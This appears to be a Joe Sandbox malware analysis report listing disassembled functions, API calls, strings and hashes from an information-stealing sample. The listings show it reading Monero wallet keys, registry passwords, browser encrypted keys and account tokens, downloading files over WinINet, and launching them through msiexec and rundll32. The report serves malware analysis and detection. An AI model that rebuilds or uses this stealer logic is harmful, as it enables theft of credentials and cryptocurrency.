                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 5ed949630616a3f8dbb7d24e8db87e5175a508d707b47fcaa4291d298185803b
                              • Instruction ID: 9a06364319f55b5075986dd76971b128770d2eaa21ad14c4d382b9927a1278fa
                              • Opcode Fuzzy Hash: 5ed949630616a3f8dbb7d24e8db87e5175a508d707b47fcaa4291d298185803b
                              • Instruction Fuzzy Hash: F871DAB1A10208ABDB04DBE4DD89FEEB7B8FB58701F108509F515E7290DB34A905CBA2
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008631C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0086335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008634EA
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 03ab2978e96cefb50a4b0a002064ed3443cf7d4866edbdc9d01cc395b1bfc42a
                              • Instruction ID: ef1af086be10d2ddde9b16e92968589c5026b7d49a44ffbcf84723c942c499e6
                              • Opcode Fuzzy Hash: 03ab2978e96cefb50a4b0a002064ed3443cf7d4866edbdc9d01cc395b1bfc42a
                              • Instruction Fuzzy Hash: E912E8718101089ADB19EBA4DD92EEEB738FF14300F514169E506B7191EF746B4ACFA3
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 00856280: InternetOpenA.WININET(00870DFE,00000001,00000000,00000000,00000000), ref: 008562E1
                                • Part of subcall function 00856280: StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856303
                                • Part of subcall function 00856280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00856335
                                • Part of subcall function 00856280: HttpOpenRequestA.WININET(00000000,GET,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00856385
                                • Part of subcall function 00856280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008563BF
                                • Part of subcall function 00856280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008563D1
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865318
                              • lstrlen.KERNEL32(00000000), ref: 0086532F
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00865364
                              • lstrlen.KERNEL32(00000000), ref: 00865383
                              • lstrlen.KERNEL32(00000000), ref: 008653AE
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8569761c41ccb1cf26171d530374e50d9bf2a5d7ab7ea13b193e0fb183c34019
                              • Instruction ID: c61955df1d089930f8bd455ae15047b85c22c3c195a5e4b9cff33fe6bea3f012
                              • Opcode Fuzzy Hash: 8569761c41ccb1cf26171d530374e50d9bf2a5d7ab7ea13b193e0fb183c34019
                              • Instruction Fuzzy Hash: BA51A8709101489BDB18EFA8C996AED7779FF50301F514028E90AEB591EF346B46CFA3
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 0e022b64461f98a89aef800c978b0656ab9fcd6c28865fcb86e77f0f1c809531
                              • Instruction ID: de1d2ae0cda17c2d7f13c0d468aacdb493ff23d5de17b477efd51369e5ca28d4
                              • Opcode Fuzzy Hash: 0e022b64461f98a89aef800c978b0656ab9fcd6c28865fcb86e77f0f1c809531
                              • Instruction Fuzzy Hash: 83C1A8B5A001199BCF14EFA4DC89FEA7778FB64304F014599F50AE7281DE70AA85CF92
                              APIs
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008642EC
                              • lstrcat.KERNEL32(?,015CD988), ref: 0086430B
                              • lstrcat.KERNEL32(?,?), ref: 0086431F
                              • lstrcat.KERNEL32(?,015CCBB8), ref: 00864333
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 00868D90: GetFileAttributesA.KERNEL32(00000000,?,00851B54,?,?,0087564C,?,?,00870E1F), ref: 00868D9F
                                • Part of subcall function 00859CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00859D39
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 008693C0: GlobalAlloc.KERNEL32(00000000,008643DD,008643DD), ref: 008693D3
                              • StrStrA.SHLWAPI(?,015CD8E0), ref: 008643F3
                              • GlobalFree.KERNEL32(?), ref: 00864512
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859AEF
                                • Part of subcall function 00859AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00854EEE,00000000,?), ref: 00859B01
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859B2A
                                • Part of subcall function 00859AC0: LocalFree.KERNEL32(?,?,?,?,00854EEE,00000000,?), ref: 00859B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 008644A3
                              • StrCmpCA.SHLWAPI(?,008708D1), ref: 008644C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008644D2
                              • lstrcat.KERNEL32(00000000,?), ref: 008644E5
                              • lstrcat.KERNEL32(00000000,00870FB8), ref: 008644F4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8141fb6a5d1c672a6afb81b46059f3271787b0bdb9f297bb7ed1f1049ed793d4
                              • Instruction ID: e76d8bd55f88eed250f03ce1c6612aafa6d22fda036934de14e070162f5c086a
                              • Opcode Fuzzy Hash: 8141fb6a5d1c672a6afb81b46059f3271787b0bdb9f297bb7ed1f1049ed793d4
                              • Instruction Fuzzy Hash: CA711376910208A7DB14EBE4DC89FEE7779FB58300F048599E509A7181EE34DA49CF92
                              APIs
                                • Part of subcall function 008512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008512B4
                                • Part of subcall function 008512A0: RtlAllocateHeap.NTDLL(00000000), ref: 008512BB
                                • Part of subcall function 008512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008512D7
                                • Part of subcall function 008512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008512F5
                                • Part of subcall function 008512A0: RegCloseKey.ADVAPI32(?), ref: 008512FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0085134F
                              • lstrlen.KERNEL32(?), ref: 0085135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00851377
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00851465
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 008514EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: ed4472bca53511d1397619a0b057f1c2887a5016c0c7dce923c0dfab724e2dc8
                              • Instruction ID: a18a5790aecb32f95e9a4fed8219d3554cd2cc00357e0bb0d148841d26a0e88f
                              • Opcode Fuzzy Hash: ed4472bca53511d1397619a0b057f1c2887a5016c0c7dce923c0dfab724e2dc8
                              • Instruction Fuzzy Hash: B25130B195011897CB19EB64DD92BED733CFB50300F4141A9B60AF2081EE305B89CFA7
                              APIs
                                • Part of subcall function 008572D0: memset.MSVCRT ref: 00857314
                                • Part of subcall function 008572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0085733A
                                • Part of subcall function 008572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008573B1
                                • Part of subcall function 008572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0085740D
                                • Part of subcall function 008572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00857452
                                • Part of subcall function 008572D0: HeapFree.KERNEL32(00000000), ref: 00857459
                              • lstrcat.KERNEL32(00000000,008717FC), ref: 00857606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00857648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0085765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0085768F
                              • lstrcat.KERNEL32(00000000,00871804), ref: 008576A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008576D3
                              • lstrcat.KERNEL32(00000000,00871808), ref: 008576ED
                              • task.LIBCPMTD ref: 008576FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: 88035deafd6078a864bf50cad892ad4ab90214a50823b1a50f2ff56113300487
                              • Instruction ID: 3a0bbe26a6aabfc0f70523f24d8fe8b93f55d674164317ad0ada75784281a5a2
                              • Opcode Fuzzy Hash: 88035deafd6078a864bf50cad892ad4ab90214a50823b1a50f2ff56113300487
                              • Instruction Fuzzy Hash: 36311E71A10109DBCF04EBF8DC95DEE7778FB64306B14811AE516E7290DE34A94BCB92
                              APIs
                              • memset.MSVCRT ref: 00857314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0085733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008573B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0085740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00857452
                              • HeapFree.KERNEL32(00000000), ref: 00857459
                              • task.LIBCPMTD ref: 00857555
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: f3cc514c642fe01c390e42b91c946d6a743d8cacb1fc6768f96e4b71804752d7
                              • Instruction ID: c94f724466ddd9fa460093bb46c21099148ac7c121290ad1766f38f0a43affea
                              • Opcode Fuzzy Hash: f3cc514c642fe01c390e42b91c946d6a743d8cacb1fc6768f96e4b71804752d7
                              • Instruction Fuzzy Hash: 99612BB5904268DBDB24DB54DC45BDAB7B8FF44301F0081EAEA89A6141EF705BC9CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015CDEF8,00000000,?,00870E2C,00000000,?,00000000), ref: 00868130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00868137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00868158
                              • __aulldiv.LIBCMT ref: 00868172
                              • __aulldiv.LIBCMT ref: 00868180
                              • wsprintfA.USER32 ref: 008681AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 8bea1331c4ac51b787a2c8d6a6b71cecf440ac176adac7ee1db8e316f3c24862
                              • Instruction ID: 2e7028925040ff145bc6ee7a2f540ba977a7afa2afecc4cb20bc4d6649936a5b
                              • Opcode Fuzzy Hash: 8bea1331c4ac51b787a2c8d6a6b71cecf440ac176adac7ee1db8e316f3c24862
                              • Instruction Fuzzy Hash: F3211DB1E44318ABDB00DFD5CC49FAEB7B8FB44B14F10460AF615BB280DB7859018BA5
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                              • InternetOpenA.WININET(00870DF7,00000001,00000000,00000000,00000000), ref: 0085610F
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0085618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008561B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 008561DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0085620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00856249
                              • InternetCloseHandle.WININET(?), ref: 00856253
                              • InternetCloseHandle.WININET(00000000), ref: 00856260
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: a4cbe5ff769f2e3fa75860d7fa142664da12c211b016b57caf9057d2a63edc32
                              • Instruction ID: 57c3a843ba977a31e377c75f38f71013ffee2d7abc2d1d6fd7a047c3e82f290c
                              • Opcode Fuzzy Hash: a4cbe5ff769f2e3fa75860d7fa142664da12c211b016b57caf9057d2a63edc32
                              • Instruction Fuzzy Hash: 39519370A00218ABDF20DF90CC45BEE7778FB44305F508199B605E71C0EB746A89CF96
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0085BC9F
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0085BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0085BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0085BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 17e70823dfb760edb8ec55c0af36657f831eb355128d42987d6e329bc982a6a0
                              • Instruction ID: 850a6aca7fa90327d3f459a32dfe8e692a97db7664ed9dd20a619e5a9f9f23b4
                              • Opcode Fuzzy Hash: 17e70823dfb760edb8ec55c0af36657f831eb355128d42987d6e329bc982a6a0
                              • Instruction Fuzzy Hash: F8B127729101089ADB08EBA8CD96AEE7339FF24300F514129B506F7191EE346A49CFA3
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
